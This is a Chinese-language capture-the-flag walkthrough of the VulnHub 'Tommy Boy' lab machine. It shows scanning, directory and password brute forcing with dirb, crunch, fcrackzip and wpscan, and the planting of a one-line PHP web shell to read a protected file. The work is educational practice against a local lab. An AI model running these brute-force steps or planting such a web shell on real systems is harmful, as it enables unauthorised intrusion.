本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/tommy-boy-1,157/
nmap -p- -n -sC -sV 192.168.5.144 -o tommyboy.nmap
扫描得出结果开放了3个端口,先看看web端口
根据nmap的扫描记过访问robots.txt
得到上述页面,尝试每个页面访问一下,确认每个里面都有张图片,并且下载下来,然后使用strings命令查看是否存敏感信息,但是并没有发现敏感信息,访问另一个非图片的文件flag-numero-uno.txt,可以得出此时第一个需要获取的flag
===================================================================================================================================================================================
我们开始找第二个flag,再次访问目标web网站,没发现什么有价值的东西,顺便看看源码
根据网页源码发现一个YouTube视频网站URL地址,访问看看,发现一个关键字prehistoricforest,尝试直接在web页面访问这个路径看看
发现是个WordPress博客网站,目标网站有4篇文章,其中一篇文章被设置了密码,先放着,看看其他几篇文章,结果发现有篇文章下面有留言给出了关键信息
Flag #2: thisisthesecondflagyayyou.txt
根据这个意思是反馈这是第二个flag,我们把他当做网站路径访问看看
直接得到了第二个flag
Flag data: Z4l1nsky
==================================================================================================================================================================================
开始下一个征程 访问:http://192.168.5.144/prehistoricforest/index.php/2016/07/07/son-of-a/#comment-4
确认关键字richard、直接当web路径访问看下
发现有张照片,将照片下载下来,使用strings命令看看是否存在隐藏的敏感信息,
发现一个hash值 ce154b5a8e59c89732bc25d6a2e6b90b 将其丢到somd5.com进行破解看看
发现破解出来了密码,使用这个密码进行访问那个被加密的文章
===============================================================================================================================================================================
访问被加密的文章根据其内容可以知道有个ftp高端口,通过nmap进行全端口扫描,发现如下信息
确定开放的ftp端口是65534 ,尝试去连接下这个端口
访问下载了一个文件名为readme.txt文件
下载想下来查看内容:
反馈的大概意思就是有个文件夹NickIzL33t 文件夹下面有个加密的zip压缩包,此时再访问刚开始的时候使用nmap扫描出来的8008端口
根据提示限制了user-agent,只允许iPhone手机可以访问对应的内容,那么我们可以使用burpsuite配置替换user-agent来完成
然后使用dirb命令进行暴力猜解目录,图形界面的也可以,我这里使用命令行的方式靠谱,我使用图形界面的爆破一段时间出现异常
命令如下:
dirb http://192.168.56.5:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/
5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/13C71 Saf
ari/601.1.46"
最后爆破出来一个html路径如下:
http://192.168.5.144:8008/NickIzL33t/fallon1.html
访问上述3个路径,又得到了一个flag和密码爆破提示信息及需要破解的压缩包文件
这是密码提示信息,作为后面生成密码的重要参考依据
下载加密的压缩文件,我这里的浏览器使用了burp代理替换user-agent可以直接下载,也可以通过curl命令指定user-agent下载,如下:
curl --user-agent "Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20" -v http://192.168.5.144:8008/NickIzL33t/t0msp4ssw0rdz.zip -o tom.zip
下载的时候将其改名为tom.zip
得到了需要破解的zip文件,然后开始根据提示生成密码文件,这里使用crunch命令进行生成
crunch 13 13 -t bev,%%@@^1995 -o passlist_tomboy.txt
破解zip压缩文件,同样是使用fcrackzip命令进行破解,命令如下:
fcrackzip -v -D -u -p passlist_tomboy.txt tom.zip
上述是最终的破解结果 bevH00tr$1995
查看解压后的密码信息
此时的信息可能跟之前的web访问页面WordPress有关,使用wpscan进行扫描探测存在哪些用户名
wpscan --url http://192.168.5.144/prehistoricforest -P /usr/share/wordlists/rockyou.txt -U tom
探测出来用户名是tom密码为tomtom1
进入之后发现发件箱有一封邮件
对比前面解密压缩包的文件信息
可以得出账号和密码
Username: bigtommysenior
Password: fatguyinalittlecoat1938!!
进行ssh登陆
翻看根目录发现文件.5.txt但是当前用户权限不可以看,需要www-data权限,此时去看看网站的根目录,翻到一个uploads文件夹,而且权限是全局都有的
那么我直接在此文件夹下创建一个shell.php然后代码是<?php system($_GET['shit']); ?> 然后在web浏览器上执行
http://192.168.5.144:8008/NickIzL33t/P4TCH_4D4MS/uploads/shell.php?shit=cat%20/.5.txt
Flag data: Buttcrack
汇总前面得到的flag
flag1:B34rcl4ws
flag2:Z4l1nsky
flag3:TinyHead
flag4:EditButton
flag5:Buttcrack
得到密码:B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack
解压文件LOOT.ZIP就得到了所有的flag,如下:
